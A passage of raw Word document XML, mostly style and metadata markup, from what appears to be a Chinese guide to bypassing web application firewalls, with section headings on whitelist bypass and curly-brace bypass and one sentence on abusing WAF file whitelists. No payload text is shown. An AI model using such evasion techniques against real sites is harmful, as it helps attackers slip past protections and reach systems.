          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.17、白名单绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:p w14:paraId="6C2BF8AC">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="u0f778704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>有些 WAF 会自带一些文件白名单，对于白名单 waf 不会拦截任何操作，比如白名单目录，白名单文件等等，所以可以利用这个特点，可以进行突破。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="148"/>
    <w:p w14:paraId="3AA34111">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="uf08a105b"/>
      <w:bookmarkStart w:id="150" w:name="u88bdac59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="48304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6366934" cy="5264682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:p w14:paraId="3936F4DC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="AdSk1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.18、花括号绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:p w14:paraId="7CB3F5AA">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="ud01317e3"/>
      <w:bookmarkStart w:id="153" w:name="u235e3898"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="1583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6333066" cy="1716243"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:bookmarkEnd w:id="153"/>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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="0053208E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0053208E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="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footnotePr>
    <w:footnote w:id="0"/>
    <w:footnote w:id="1"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="0"/>
    <w:endnote w:id="1"/>
  </w:endnotePr>
  <w:compat>
    <w:useFELayout/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
    <w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiZWY4MjVhNDA5MTAyNTcyZGJmY2U2ZjRhMTA0YzkxY2MifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="73DF63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宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="19"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="38"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="20"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="21"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz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uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="35"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="17"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="22"/>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11">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="23"/>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13">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="12"/>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Emphasis"/>
    <w:basedOn w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="14"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="366091" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="11"/>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24">
    <w:name w:val="_Style 23"/>
    <w:uiPriority w:val="0"/>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2944</Words>
  <Characters>4520</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4690</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2024-08-04T17:44:49Z</dcterms:created>
  <dc:creator>hx135</dc:creator>
  <cp:lastModifiedBy>WPS_1612336700</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-04T17:45:44Z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A63BA1D9B04B4AE3BA79D23C5063BC53_12</vt:lpwstr>
  </property>
</Properties>
</file>